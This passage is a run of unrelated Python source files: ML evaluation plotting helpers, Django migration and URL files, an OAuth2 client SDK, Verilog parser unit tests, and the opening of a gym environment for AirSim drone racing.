with open(os.path.join(config.plot_dir, filename + '_cm.txt' ), "w") as text_file: print(classification_report(y_test_CNN, np.argmax(y_pred_CNN, axis=1)), file=text_file) # Now plot multi-class ROC: compute_plot_roc_multiclass(y_test_CNN, y_pred_CNN, filename, classes, title=None) # Plot also precision-recall curves: compute_plot_pr_multiclass(y_test_CNN, y_pred_CNN, filename, classes, title=None) # Calculate confusion matrix cnf_matrix_unnorm = confusion_matrix(y_test_CNN, np.argmax(y_pred_CNN, axis=1)) # Now normalise cnf_matrix = cnf_matrix_unnorm/cnf_matrix_unnorm.sum(1) fig = plt.figure(figsize=(15, 8)) plt.imshow(cnf_matrix, cmap=plt.cm.Blues) #plot confusion matrix grid threshold = cnf_matrix.max() / 2 #threshold to define text color for i in range(cnf_matrix.shape[0]): #print text in grid for j in range(cnf_matrix.shape[1]): plt.text(j-0.2, i, cnf_matrix_unnorm[i,j], color="w" if cnf_matrix[i,j] > threshold else 'black') tick_marks = np.arange(len(classes)) #define labeling spacing based on number of classes plt.xticks(tick_marks, classes, rotation=45) plt.yticks(tick_marks, classes) plt.ylabel('True label') # plt.title(') plt.xlabel('Predicted label') # plt.colorbar(label='Accuracy') plt.tight_layout() plt.savefig(os.path.join(config.plot_dir, filename + '_MSC_cm.pdf' ),bbox_inches='tight') return fig def compute_plot_roc_multiclass(y_true, y_pred_prob, filename, classes, title=None): '''y_true: non-categorical y label. y_pred_prob: model.predict output of NN. ''' fpr = dict() tpr = dict() roc_auc = dict() for i in range(len(classes)): fpr[i], tpr[i], _ = sklearn.metrics.roc_curve(to_categorical(y_true)[:, i], y_pred_prob[:, i]) roc_auc[i] = sklearn.metrics.auc(fpr[i], tpr[i]) # Compute micro-average ROC curve and ROC area fpr["micro"], tpr["micro"], _ = sklearn.metrics.roc_curve(to_categorical(y_true).ravel(), y_pred_prob.ravel()) roc_auc["micro"] = sklearn.metrics.auc(fpr["micro"], tpr["micro"]) with open(os.path.join(config.plot_dir, filename + '_roc.txt' ), "w") as text_file: print(roc_auc, file=text_file) lw=2 # First aggregate all false positive rates all_fpr = np.unique(np.concatenate([fpr[i] for i in range(len(classes))])) # Then interpolate all ROC curves at this points mean_tpr = np.zeros_like(all_fpr) for i in range(len(classes)): mean_tpr += np.interp(all_fpr, fpr[i], tpr[i]) # Finally average it and compute AUC mean_tpr /= len(classes) fpr["macro"] = all_fpr tpr["macro"] = mean_tpr roc_auc["macro"] = sklearn.metrics.auc(fpr["macro"], tpr["macro"]) # Plot all ROC curves plt.figure() plt.plot(fpr["micro"], tpr["micro"], label='micro-average ROC curve (area = {0:0.3f})' ''.format(roc_auc["micro"]), color='deeppink', linestyle=':', linewidth=4) plt.plot(fpr["macro"], tpr["macro"], label='macro-average ROC curve (area = {0:0.3f})' ''.format(roc_auc["macro"]), color='navy', linestyle=':', linewidth=4) # colors = cycle(['aqua', 'darkorange', 'cornflowerblue']) for i in range(len(classes)): plt.plot(fpr[i], tpr[i], lw=lw, label='{0} (area = {1:0.3f})' ''.format(classes[i], roc_auc[i])) plt.plot([0, 1], [0, 1], 'k--', lw=lw) plt.xlim([0.0, 1.0]) plt.ylim([0.0, 1.05]) plt.xlabel('False Positive Rate') plt.ylabel('True Positive Rate') plt.title(title) plt.legend(loc="lower right") plt.savefig(os.path.join(config.plot_dir, filename + '_MSC_ROC.pdf' ),bbox_inches='tight') plt.show() def compute_plot_pr_multiclass(y_true, y_pred_prob, filename, classes, title=None): # For each class n_classes = 8 precision = dict() recall = dict() average_precision = dict() Y_test = 
to_categorical(y_true) y_score = y_pred_prob for i in range(n_classes): precision[i], recall[i], _ = precision_recall_curve(Y_test[:, i], y_score[:, i]) average_precision[i] = average_precision_score(Y_test[:, i], y_score[:, i]) # A "micro-average": quantifying score on all classes jointly precision["micro"], recall["micro"], _ = precision_recall_curve(Y_test.ravel(), y_score.ravel()) average_precision["micro"] = average_precision_score(Y_test, y_score, average="micro") with open(os.path.join(config.plot_dir, filename + '_pr.txt' ), "w") as text_file: print(average_precision, file=text_file) plt.figure(figsize=(7, 8)) f_scores = np.linspace(0.2, 0.8, num=4) lines = [] labels = [] for f_score in f_scores: x = np.linspace(0.01, 1) y = f_score * x / (2 * x - f_score) l, = plt.plot(x[y >= 0], y[y >= 0], color='gray', alpha=0.2) plt.annotate('f1={0:0.1f}'.format(f_score), xy=(0.9, y[45] + 0.02)) lines.append(l) labels.append('iso-f1 curves') l, = plt.plot(recall["micro"], precision["micro"], color='gold', lw=2) lines.append(l) labels.append('micro-average (area = {0:0.3f})' ''.format(average_precision["micro"])) for i in range(n_classes): l, = plt.plot(recall[i], precision[i], lw=2) lines.append(l) labels.append('{0} (area = {1:0.3f})' ''.format(classes[i], average_precision[i])) fig = plt.gcf() fig.subplots_adjust(bottom=0.25) plt.xlim([0.0, 1.0]) plt.ylim([0.0, 1.05]) plt.xlabel('Recall') plt.ylabel('Precision') plt.title('Extension of Precision-Recall curve to multi-class') plt.legend(lines, labels, loc='center left', bbox_to_anchor=(1, 0.5)) plt.savefig(os.path.join(config.plot_dir, filename + '_MSC_PR.pdf' ),bbox_inches='tight') # Tools for reshaping data: def to_categorical(y, num_classes=None, dtype='float32'): """Converts a class vector (integers) to binary class matrix. E.g. for use with `categorical_crossentropy`. Args: y: Array-like with class values to be converted into a matrix (integers from 0 to `num_classes - 1`). num_classes: Total number of classes. If `None`, this would be inferred as `max(y) + 1`. dtype: The data type expected by the input. Default: `'float32'`. Returns: A binary matrix representation of the input. The class axis is placed last. Example: >>> a = tf.keras.utils.to_categorical([0, 1, 2, 3], num_classes=4) >>> a = tf.constant(a, shape=[4, 4]) >>> print(a) tf.Tensor( [[1. 0. 0. 0.] [0. 1. 0. 0.] [0. 0. 1. 0.] [0. 0. 0. 1.]], shape=(4, 4), dtype=float32) >>> b = tf.constant([.9, .04, .03, .03, ... .3, .45, .15, .13, ... .04, .01, .94, .05, ... .12, .21, .5, .17], ... shape=[4, 4]) >>> loss = tf.keras.backend.categorical_crossentropy(a, b) >>> print(np.around(loss, 5)) [0.10536 0.82807 0.1011 1.77196] >>> loss = tf.keras.backend.categorical_crossentropy(a, a) >>> print(np.around(loss, 5)) [0. 0. 0. 0.] 
""" y = np.array(y, dtype='int') input_shape = y.shape if input_shape and input_shape[-1] == 1 and len(input_shape) > 1: input_shape = tuple(input_shape[:-1]) y = y.ravel() if not num_classes: num_classes = np.max(y) + 1 n = y.shape[0] categorical = np.zeros((n, num_classes), dtype=dtype) categorical[np.arange(n), y] = 1 output_shape = input_shape + (num_classes,) categorical = np.reshape(categorical, output_shape) return categorical # For multi-class evaluation for both PyTorch and Keras: -> Used for Keras with evaluate model below def evaluate_model_aggregated(model, X_test, y_test, n_samples): n_classes = 8 preds_aggregated_by_mean = [] y_aggregated_prediction_by_mean = [] y_target_aggregated = [] for idx, recording in enumerate(X_test): n_target_windows = len(recording)//2 # Calculate expected length: discard edge y_target = np.repeat(y_test[idx],n_target_windows) # Create y array of correct length preds = evaluate_model(model, recording, np.repeat(y_test[idx],len(recording)),n_samples) # Sample BNN preds = np.mean(preds, axis=0) # Average across BNN samples preds = preds[:n_target_windows*2,:] # Discard edge case preds = np.mean(preds.reshape(-1,2,n_classes), axis=1) # Average every 2 elements, across n_classes preds_y = np.argmax(preds, axis=1) # Append argmax prediction (label output) y_aggregated_prediction_by_mean.append(preds_y) preds_aggregated_by_mean.append(preds) # Append prob (or log-prob/other space) y_target_aggregated.append(y_target) # Append y_target return np.concatenate(preds_aggregated_by_mean), np.concatenate(y_aggregated_prediction_by_mean), np.concatenate(y_target_aggregated) # Helper function to run evaluate_model_aggregated for Keras models def evaluate_model(model, X_test, y_test, n_samples): all_y_pred = [] for n in range(n_samples): all_y_pred.append(model.predict(X_test)) return all_y_predsrc/profiles/migrations/0014_profile_background.py # -*- coding: utf-8 -*- # Generated by Django 1.9.4 on 2016-08-30 01:12 from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('profiles', '0013_auto_20160803_0244'), ] operations = [ migrations.AddField( model_name='profile', name='background', field=models.ImageField(blank=True, null=True, upload_to='profile_background/%Y/%m/%d/', verbose_name='Portada'), ), ] # -*- coding: utf-8 -*- from django.conf.urls import * from django.contrib import admin urlpatterns = patterns('', url(r'^set_language/$', 'django.views.i18n.set_language', {}, name='set_language'), url(r'^admin/', include(admin.site.urls)),) CPSuperstore/FangCloudServicesAppAccessSDK import threading import time import typing import urllib.parse import requests import FCSAppAccess.exceptions as exceptions import FCSAppAccess.models.device_code as device_code_model class FCSAppAccess: url_base = "https://fangcloudservices.pythonanywhere.com/api/v1" def __init__(self, client_id: str, client_secret: str, scope: typing.Union[str, typing.List[str]]): self._client_id = client_id self._client_secret = client_secret self._scope = scope if isinstance(self._scope, str): self._scope = [self._scope] self._access_token = None self._refresh_token = None def get_scope_string(self) -> str: return " ".join(self._scope) def set_access_token(self, access_token: str, refresh_token: str = None): self._access_token = access_token if refresh_token is not None: self._refresh_token = refresh_token def get_tokens(self) -> typing.Tuple[str, str]: return self._access_token, self._refresh_token def 
get_access_token(self) -> str: return self._access_token def get_refresh_token(self) -> str: return self._refresh_token def _url_encode(self, text: str) -> str: return urllib.parse.quote_plus(str(text)) def client_credentials(self) -> typing.Tuple[str, str]: r = requests.post(self.url_base + "/oauth2", json={ "grant_type": "client_credentials", "client_id": self._client_id, "client_secret": self._client_secret, "scope": self.get_scope_string() }) if r.status_code == 400: if r.json()["error"] == "invalid_grant": raise exceptions.InvalidGrantException( "The provided client_id and client_secret do not match an active application" ) self._scope = r.json()["scope"].split(" ") self.set_access_token(r.json()["access_token"], r.json()["refresh_token"]) return r.json()["access_token"], r.json()["refresh_token"] def refresh_token(self) -> typing.Tuple[str, str]: r = requests.post(self.url_base + "/oauth2", json={ "grant_type": "refresh_token", "client_id": self._client_id, "access_token": self._access_token, "refresh_token": self._refresh_token }) self.set_access_token(r.json()["access_token"], r.json()["refresh_token"]) return r.json()["access_token"], r.json()["refresh_token"] def get_auth_code_url(self, redirect_uri: str) -> str: return self.url_base + "/oauth2/code?client_id={}&redirect_uri={}&response_type=code&scope={}".format( self._client_id, redirect_uri, self._url_encode(self.get_scope_string()) ) def authorization_code(self, auth_code: str) -> typing.Tuple[str, str]: r = requests.post(self.url_base + "/oauth2", json={ "grant_type": "authorization_code", "client_id": self._client_id, "client_secret": self._client_secret, "code": auth_code }) self.set_access_token(r.json()["access_token"], r.json()["refresh_token"]) return r.json()["access_token"], r.json()["refresh_token"] def device_code(self) -> device_code_model.DeviceCode: r = requests.post(self.url_base + "/oauth2", json={ "grant_type": "device_code", "client_id": self._client_id, "client_secret": self._client_secret, "scopes": self.get_scope_string() }) return device_code_model.DeviceCode(**r.json()) def device_code_poll(self, device_code: device_code_model.DeviceCode) -> typing.Tuple[str, str]: while True: r = requests.post(self.url_base + "/oauth2", json={ "grant_type": "device_code", "client_id": self._client_id, "client_secret": self._client_secret, "device_code": device_code.device_code }) json = r.json() if r.status_code == 400: if json["error"] == "access_denied": raise exceptions.AccessDeniedException("The client has rejected the request") elif json["error"] == "expired_token": raise exceptions.ExpiredTokenException("The device code you have requested is expired") elif r.status_code == 200: self.set_access_token(r.json()["access_token"], r.json()["refresh_token"]) return r.json()["access_token"], r.json()["refresh_token"] time.sleep(device_code.interval.total_seconds()) def device_code_poll_async(self, device_code: device_code_model.DeviceCode) -> threading.Thread: t = threading.Thread( target=self.device_code_poll, args=(device_code, ), daemon=True, name="FCSAppAccessSDK_DeviceCodePollThread" ) t.start() return t # This Source Code Form is subject to the terms of the Mozilla Public # License, v. 2.0. If a copy of the MPL was not distributed with this file, # You can obtain one at http://mozilla.org/MPL/2.0/. 
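# --- Editor's sketch (hedged): typical use of the device-code grant exposed by the
# FCSAppAccess class above. The import path and credential strings are placeholders;
# only the constructor signature, device_code() and device_code_poll() are taken from
# the class as written.
from FCSAppAccess import FCSAppAccess  # assumed package layout

client = FCSAppAccess('my-client-id', 'my-client-secret', scope=['example.scope'])
dc = client.device_code()                                  # start the flow
access_token, refresh_token = client.device_code_poll(dc)  # blocks until approved, denied or expired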
# # Copyright (c) 2014-2019, """ Test of the Verilog parser """ from unittest import TestCase import os from os.path import join, dirname, exists import time import shutil from unittest import mock from vunit.ostools import renew_path from vunit.parsing.verilog.parser import VerilogParser class TestVerilogParser(TestCase): # pylint: disable=too-many-public-methods """ Test of the Verilog parser """ def setUp(self): self.output_path = join(dirname(__file__), "test_verilog_parser_out") renew_path(self.output_path) self.cwd = os.getcwd() os.chdir(self.output_path) def tearDown(self): os.chdir(self.cwd) shutil.rmtree(self.output_path) def test_parsing_empty(self): design_file = self.parse("") self.assertEqual(design_file.modules, []) def test_parse_module(self): modules = self.parse( """\ module true1; my_module hello "module false"; endmodule /* module false */ module true2; // module false endmodule module true3 endmodule """ ).modules self.assertEqual(len(modules), 3) self.assertEqual(modules[0].name, "true1") self.assertEqual(modules[1].name, "true2") self.assertEqual(modules[2].name, "true3") def test_parse_module_with_keyword_name(self): """ We relax the requirement and allow keywords since standards may be mixed. A future enhancement could be to tokenize with awareness of the verilog standard """ modules = self.parse( """\ module global; endmodule module soft; endmodule """ ).modules self.assertEqual(len(modules), 2) self.assertEqual(modules[0].name, "global") self.assertEqual(modules[1].name, "soft") def test_parse_parameter_without_type(self): modules = self.parse( """\ module foo; parameter param1; parameter param2 = 1; endmodule """ ).modules self.assertEqual(len(modules), 1) module = modules[0] self.assertEqual(module.name, "foo") self.assertEqual(len(module.parameters), 2) param1, param2 = module.parameters self.assertEqual(param1, "param1") self.assertEqual(param2, "param2") def test_parse_parameter_with_type(self): modules = self.parse( """\ module foo; parameter string param1; parameter integer param2 = 1; endmodule """ ).modules self.assertEqual(len(modules), 1) module = modules[0] self.assertEqual(module.name, "foo") self.assertEqual(len(module.parameters), 2) param1, param2 = module.parameters self.assertEqual(param1, "param1") self.assertEqual(param2, "param2") def test_nested_modules_are_ignored(self): modules = self.parse( """\ module foo; parameter string param1; module nested; parameter integer param_nested; endmodule parameter string param2; endmodule """ ).modules self.assertEqual(len(modules), 1) module = modules[0] self.assertEqual(module.name, "foo") self.assertEqual(len(module.parameters), 2) param1, param2 = module.parameters self.assertEqual(param1, "param1") self.assertEqual(param2, "param2") def test_parse_package(self): packages = self.parse( """\ package true1; endpackage package true2; endpackage """ ).packages self.assertEqual(len(packages), 2) self.assertEqual(packages[0].name, "true1") self.assertEqual(packages[1].name, "true2") def test_parse_imports(self): imports = self.parse( """\ import true1; package pkg; import true2::*; endpackage """ ).imports self.assertEqual(len(imports), 2) self.assertEqual(imports[0], "true1") self.assertEqual(imports[1], "true2") def test_parse_package_references(self): package_references = self.parse( """\ import false1; import false1::false2::*; package pkg; true1::func(true2::bar()); true3::foo(); endpackage """ ).package_references self.assertEqual(len(package_references), 3) self.assertEqual(package_references[0], 
"true1") self.assertEqual(package_references[1], "true2") self.assertEqual(package_references[2], "true3") @mock.patch("vunit.parsing.verilog.parser.LOGGER", autospec=True) def test_parse_import_with_bad_argument(self, logger): imports = self.parse( """\ import; """ ).imports self.assertEqual(len(imports), 0) logger.warning.assert_called_once_with( "import bad argument\n%s", "at file_name.sv line 1:\n" "import;\n" " ~" ) @mock.patch("vunit.parsing.verilog.parser.LOGGER", autospec=True) def test_parse_import_eof(self, logger): imports = self.parse( """\ import """ ).imports self.assertEqual(len(imports), 0) logger.warning.assert_called_once_with( "EOF reached when parsing import\n%s", "at file_name.sv line 1:\n" "import\n" "~~~~~~", ) def test_parse_instances(self): instances = self.parse( """\ module name; true1 instance_name1(); true2 instance_name2(.foo(bar)); true3 #(.param(1)) instance_name3(.foo(bar)); endmodule """ ).instances self.assertEqual(len(instances), 3) self.assertEqual(instances[0], "true1") self.assertEqual(instances[1], "true2") self.assertEqual(instances[2], "true3") def test_parse_instances_after_block_label(self): instances = self.parse( """\ module name; genvar i; generate for( i=0; i < 10; i = i + 1 ) begin: INST_GEN true1 instance_name1(); end : INST_GEN true2 instance_name2(); endgenerate endmodule """ ).instances self.assertEqual(len(instances), 2) self.assertEqual(instances[0], "true1") self.assertEqual(instances[1], "true2") def test_parse_instances_without_crashing(self): instances = self.parse( """\ module name; endmodule identifier """ ).instances self.assertEqual(len(instances), 0) def test_can_set_pre_defined_defines(self): code = """\ `ifdef foo `foo endmodule; `endif """ result = self.parse(code, defines={"foo": "module mod1;"}) self.assertEqual(len(result.modules), 1) self.assertEqual(result.modules[0].name, "mod1") def test_result_is_cached(self): code = """\ `include "missing.sv" module name; true1 instance_name1(); true2 instance_name2(.foo(bar)); true3 #(.param(1)) instance_name3(.foo(bar)); endmodule """ cache = {} result = self.parse(code, cache=cache) instances = result.instances self.assertEqual(len(instances), 3) self.assertEqual(instances[0], "true1") self.assertEqual(instances[1], "true2") self.assertEqual(instances[2], "true3") new_result = self.parse(code, cache=cache) self.assertEqual(id(result), id(new_result)) cache.clear() new_result = self.parse(code, cache=cache) self.assertNotEqual(id(result), id(new_result)) def test_cached_parsing_updated_by_changing_file(self): code = """\ module mod1; endmodule """ cache = {} result = self.parse(code, cache=cache) self.assertEqual(len(result.modules), 1) self.assertEqual(result.modules[0].name, "mod1") tick() code = """\ module mod2; endmodule """ result = self.parse(code, cache=cache) self.assertEqual(len(result.modules), 1) self.assertEqual(result.modules[0].name, "mod2") def test_cached_parsing_updated_by_includes(self): self.write_file( "include.svh", """ module mod; endmodule; """, ) code = """\ `include "include.svh" """ cache = {} result = self.parse(code, cache=cache, include_paths=[self.output_path]) self.assertEqual(len(result.modules), 1) self.assertEqual(result.modules[0].name, "mod") tick() self.write_file( "include.svh", """ module mod1; endmodule; module mod2; endmodule; """, ) result = self.parse(code, cache=cache, include_paths=[self.output_path]) self.assertEqual(len(result.modules), 2) self.assertEqual(result.modules[0].name, "mod1") self.assertEqual(result.modules[1].name, 
"mod2") def test_cached_parsing_updated_by_higher_priority_file(self): cache = {} include_paths = [self.output_path, join(self.output_path, "lower_prio")] self.write_file( join("lower_prio", "include.svh"), """ module mod_lower_prio; endmodule; """, ) code = """\ `include "include.svh" """ result = self.parse(code, cache=cache, include_paths=include_paths) self.assertEqual(len(result.modules), 1) self.assertEqual(result.modules[0].name, "mod_lower_prio") self.write_file( "include.svh", """ module mod_higher_prio; endmodule; """, ) result = self.parse(code, cache=cache, include_paths=include_paths) self.assertEqual(len(result.modules), 1) self.assertEqual(result.modules[0].name, "mod_higher_prio") def test_cached_parsing_updated_by_other_defines(self): cache = {} code = """\ `ifdef foo module `foo endmodule; `endif """ result = self.parse(code, cache=cache) self.assertEqual(len(result.modules), 0) result = self.parse(code, cache=cache, defines={"foo": "mod1"}) self.assertEqual(len(result.modules), 1) self.assertEqual(result.modules[0].name, "mod1") result = self.parse(code, cache=cache, defines={"foo": "mod2"}) self.assertEqual(len(result.modules), 1) self.assertEqual(result.modules[0].name, "mod2") def write_file(self, file_name, contents): """ Write file with contents into output path """ full_name = join(self.output_path, file_name) full_path = dirname(full_name) if not exists(full_path): os.makedirs(full_path) with open(full_name, "w") as fptr: fptr.write(contents) def parse(self, code, include_paths=None, cache=None, defines=None): """ Helper function to parse """ self.write_file("file_name.sv", code) cache = cache if cache is not None else {} parser = VerilogParser(database=cache) include_paths = include_paths if include_paths is not None else [] design_file = parser.parse("file_name.sv", include_paths, defines) return design_file def tick(): """ To get a different file modification time """ time.sleep(0.01) yannbouteiller/gym-airsimdroneracinglab # This is the gym environment core # Several flavors are available # In some flavors, actions are taken at the NEXT time-step (Real Time RL setting) # In some flavors, actions are taken at the CURRENT time-step (usual RL setting) # Some flavors pause the environment between each step (time stop) # Some flavors run continuously (no time control) - for these flavors step() has to be called from a timer # Depending on the values of syncronous_actions and synchronous_states, the simulator can be paused or not to retrieve observations for both drones and send them new actions # To look into how rewards are defined, read rewardfunction.py from gym import Env import gym.spaces as spaces import numpy as np from gym_game_of_drones.envs.multi_agent.gym_airsimdroneracinglab import rewardfunction as rf from gym_game_of_drones.envs.multi_agent.gym_airsimdroneracinglab.custom_airsim_settings_creator import CustomAirSimSettingsCreator import time import random import airsimdroneracinglab as airsim import subprocess import os import signal import pickle import copy from gym_game_of_drones.envs.multi_agent.gym_airsimdroneracinglab.rllib_compatibility_client import LockerClient from collections import deque from threading import Thread from platform import system from pathlib import Path DEFAULT_IP_PORT_FILE_NAME = 'ip_port.obj' SYS_STR = system() if SYS_STR == 'Linux': SUB_DIR = 'ADRL/ADRL/Binaries/Linux' EXECUTABLE_NAME = 'ADRL' OPTIONS_DISPLAY = '-windowed -opengl4' # used with default DISPLAY OPTIONS_WINDOWED_NO_DISPLAY = '-windowed -opengl4 -BENCHMARK' 
OPTIONS_NO_DISPLAY = '-opengl4 -BENCHMARK' OPTIONS_NO_RENDER = '-nullrhi' # used with DISPLAY="" else: SUB_DIR = 'ADRL/ADRL/Binaries/Win64' EXECUTABLE_NAME = 'ADRL.exe' OPTIONS_DISPLAY = ['-windowed'] # used with default DISPLAY OPTIONS_WINDOWED_NO_DISPLAY = ['-windowed'] OPTIONS_NO_DISPLAY = ['-windowed'] OPTIONS_NO_RENDER = ['-nullrhi'] # used with DISPLAY="" DEFAULT_RENDERING_MODE = 'NO_DISPLAY' # 'WINDOWED_DISPLAY', 'WINDOWED_NO_DISPLAY', 'NO_DISPLAY' or 'NO_RENDER' RESET_TIMEOUT = 10 # seconds before we consider the simulator froze and needs to be killed and launched again DEFAULT_IMG_HEIGHT = 240 DEFAULT_IMG_WIDTH = 320 MAX_GETIMAGES_TRIALS = 100 SLEEP_TIME_AT_RESETRACE = 0.1 DEFAULT_RF_CONFIG = { 'constant_penalty': -1.0, # constant penalty per time-step 'collision_radius': 0.5, # collision with opponent 'velocity_gain': 10.0, # not real velocity: difference of distance to next objective between 2 get_reward() 'gate_crossed_reward': 100.0, 'gate_missed_penalty': -100.0, 'collision_penatly': -10, # collision with environment 'death_penalty': -500, # collision with opponent 'death_constant_penalty': 0.0, # after collision with opponent until the end of track (should be at least lower than constant summed penalty when lagging behind and not moving to avoid reward hacking) 'end_of_track_bonus': 100.0, # only when the last gate is crossed 'lag_penalty': -0.5, # constant additional penalty if not leading the way 'kill_reward': 50.0, 'gate_facing_reward_gain': 1.0 } class IpPort(object): def __init__(self, global_ip_count_1=1, global_ip_count_2=0, global_ip_count_3=0, global_ip_count_4=127, global_port_count=41451): self.global_ip_count_1 = global_ip_count_1 self.global_ip_count_2 = global_ip_count_2 self.global_ip_count_3 = global_ip_count_3 self.global_ip_count_4 = global_ip_count_4 self.global_port_count = global_port_count def print_with_pid(*args): """ helper function: prints along with the process pid for rllib debugging """ pid = os.getpid() print('(', pid, ') ', *args) def initialize_ip_port_file(ip_port_file_name=DEFAULT_IP_PORT_FILE_NAME): """ This should be called prior to creating the first environment """ ip_port = IpPort() f = open(ip_port_file_name, 'wb') pickle.dump(ip_port, f) f.close() def new_client(clockspeed, img_height, img_width, ip_port_file_name=DEFAULT_IP_PORT_FILE_NAME, mode='WINDOWED_DISPLAY', use_locker=True, lock_client=None): """ This function safely creates a new airsim client It can be used to create several clients in parallel a lock server has to be created by the calling process with rllib_compatibility.init_rllib_compatibility_server """ if use_locker: print_with_pid("DEBUG: new_client: waiting for lock...") lock_client.acquire() print_with_pid("DEBUG: new_client: lock acquired") # else: # rand_time = np.random.random() * 100 # print_with_pid(f"DEBUG: sleeping for {rand_time} s before starting") # time.sleep(rand_time) # print_with_pid(f"DEBUG: stopped sleeping") if not Path(ip_port_file_name).is_file(): initialize_ip_port_file(ip_port_file_name) f = open(ip_port_file_name, 'rb') ip_port = pickle.load(f) f.close() port = ip_port.global_port_count ip_str = f"{ip_port.global_ip_count_4}.{ip_port.global_ip_count_3}.{ip_port.global_ip_count_2}.{ip_port.global_ip_count_1}" print_with_pid("DEBUG: ip:", ip_str, ", port:", port) ip_port.global_port_count += 1 if ip_port.global_port_count >= 65535: ip_port.global_port_count = 41451 ip_port.global_ip_count_1 += 1 if ip_port.global_ip_count_1 >= 256: ip_port.global_ip_count_2 += 1 ip_port.global_ip_count_1 = 0 
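# --- Editor's sketch (hedged): rewardfunction.py is not shown here, so this only
# illustrates how the DEFAULT_RF_CONFIG terms are described by their comments: a constant
# per-step penalty, a gain on progress toward the next gate, discrete gate bonuses and
# penalties, and a lag penalty when not leading. It is not the project's actual reward code.
def sketch_step_reward(cfg, progress, gate_crossed=False, gate_missed=False, leading=True):
    r = cfg['constant_penalty'] + cfg['velocity_gain'] * progress
    if gate_crossed:
        r += cfg['gate_crossed_reward']
    if gate_missed:
        r += cfg['gate_missed_penalty']
    if not leading:
        r += cfg['lag_penalty']
    return r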
assert ip_port.global_ip_count_2 < 256, "ERROR: too many environments have ben created, IP overflow" f = open(ip_port_file_name, 'wb') pickle.dump(ip_port, f) f.close() my_env = os.environ.copy() # print_with_pid(f"DEBUG: setting SDL_HINT_CUDA_DEVICE to {gpu_str}") my_env["SDL_HINT_CUDA_DEVICE"] = '0' if mode == 'NO_RENDER': # for tier 1 options = OPTIONS_NO_RENDER viewmode = "NoDisplay" my_env["DISPLAY"] = "" elif mode == 'NO_DISPLAY': # for tier 2, 3 options = OPTIONS_NO_DISPLAY viewmode = "NoDisplay" my_env["DISPLAY"] = "" elif mode == 'WINDOWED_NO_DISPLAY': options = OPTIONS_WINDOWED_NO_DISPLAY viewmode = "NoDisplay" else: print("DEBUG: mode = default") options = OPTIONS_DISPLAY viewmode = "FlyWithMe" CustomAirSimSettingsCreator().write_custom_settings_file(clockspeed=clockspeed, ip=ip_str, port=port, img_height=img_height, img_width=img_width, viewmode=viewmode) dir_path = os.path.dirname(os.path.realpath(__file__)) dir_path = os.path.join(dir_path, SUB_DIR, EXECUTABLE_NAME) if SYS_STR == 'Linux': p = subprocess.Popen(dir_path + ' ' + options, bufsize=-1, stdout=None, shell=True, preexec_fn=os.setpgrp, env=my_env) else: p = subprocess.Popen([dir_path] + options, bufsize=-1, stdout=None, shell=False, env=my_env) # subprocess.run([dir_path, options], capture_output=False, shell=False, env=my_env) # p = subprocess.Popen(cmd, creationflags=subprocess.CREATE_NEW_PROCESS_GROUP) print_with_pid("DEBUG: waiting for AirSim to start...") time.sleep(10) # this is to wait for AirSim to load fully print_with_pid("DEBUG: stopped waiting") airsim_client = airsim.MultirotorClient(ip=ip_str, port=port, timeout_value=RESET_TIMEOUT) print_with_pid("DEBUG: confirmConnection()...") airsim_client.confirmConnection() time.sleep(2.0) airsim_client.simDisableRaceLog() if use_locker: print_with_pid("DEBUG: new_client: releasing lock") lock_client.release() return airsim_client, p def basis_oriented_vector(drone_base_orientation, base_vector): """ performs a change of basis for airsim vectors caution: this only *rotates* base_vector """ res = drone_base_orientation.inverse() * base_vector.to_Quaternionr() * drone_base_orientation return airsim.Vector3r(res.x_val, res.y_val, res.z_val) def basis_oriented_quaternion(drone_base_orientation, base_quaternion): """ performs a change of basis for airsim quaternions """ return drone_base_orientation.inverse() * base_quaternion def euler_to_quaternion(roll, pitch, yaw): cy = np.cos(yaw * 0.5) sy = np.sin(yaw * 0.5) cp = np.cos(pitch * 0.5) sp = np.sin(pitch * 0.5) cr = np.cos(roll * 0.5) sr = np.sin(roll * 0.5) return airsim.Quaternionr(x_val=cy * cp * sr - sy * sp * cr, y_val=sy * cp * sr + cy * sp * cr, z_val=sy * cp * cr - cy * sp * sr, w_val=cy * cp * cr + sy * sp * sr) def quaternion_to_roll_pitch_without_yaw(q): # roll (x-axis rotation) sinr_cosp = 2 * (q.w_val * q.x_val + q.y_val * q.z_val) cosr_cosp = 1 - 2 * (q.x_val * q.x_val + q.y_val * q.y_val) roll = np.arctan2(sinr_cosp, cosr_cosp) # pitch (y-axis rotation) sinp = 2 * (q.w_val * q.y_val - q.z_val * q.x_val) if np.abs(sinp) >= 1: pitch = np.copysign(np.pi / 2, sinp) # use 90 degrees if out of range else: pitch = np.arcsin(sinp) return roll, pitch def quaternion_to_yaw(q): # yaw (z-axis rotation) siny_cosp = 2 * (q.w_val * q.z_val + q.x_val * q.y_val) cosy_cosp = 1 - 2 * (q.y_val * q.y_val + q.z_val * q.z_val) yaw = np.arctan2(siny_cosp, cosy_cosp) return yaw def quaternion_to_euler(q): return quaternion_to_roll_pitch_without_yaw(q), quaternion_to_yaw(q) def yaw_to_ned_quaternion(yaw): cy = np.cos(yaw * 0.5) 
sy = np.sin(yaw * 0.5) return airsim.Quaternionr(x_val=0.0, y_val=0.0, z_val=sy, w_val=cy) def quat_to_ned_quat(q): return yaw_to_ned_quaternion(quaternion_to_yaw(q)) class airsimdroneracinglabEnv(Env): def __init__(self, config): """ gym environment for the airsimdroneracinglab competition This version of the environment is not time-controlled and step() needs to be called repeatedly in a timer (real world setting, for the Real Time RL framework) The length of low_bound and high_bound is the number of actions Parameters are packed in the config dictionary Args (config dictionary keys): airsim_client: airsimdroneracinglab.MultiRotorClient: If None (needed for rllib compatibility), then a client is created by the environement control_method_str: a string that matches the name of the control API you want to use (e.g. 'moveByAngleRatesThrottleAsync'). (add support in _set_control_method_id() and _get_args_kwargs_control_method() and when needed) low_bounds: numpy.array[(numpy.float32),...]: low bounds of all actions high_bounds: numpy.array[(numpy.float32),...]: high bounds of all actions ep_max_length: int: the max length of each episodes in timesteps drones_names: list of strings: list of agents names (optional) tier: int (default 0): competition tier (for access to everything to e.g. build a dataset, use tier 0) (optional) dummy_for_ip_port_file_init: True|False(default): if True, the environment will only be created to initialize the ip_port file. Apart from this specific use, this must be False (optional) rllib_compatibility: True|False(default): if True, the environment will only be initialized at the first reset() call (optional) rendering_mode: 'WINDOWED_DISPLAY'(default), 'WINDOWED_NO_DISPLAY', 'NO_DISPLAY' or 'NO_RENDER' (optional) time_step_method: 'JOIN'(default), 'CONTINUE_FOR_TIME' (optional) locker: True|False: whether a locker server is running and should be used 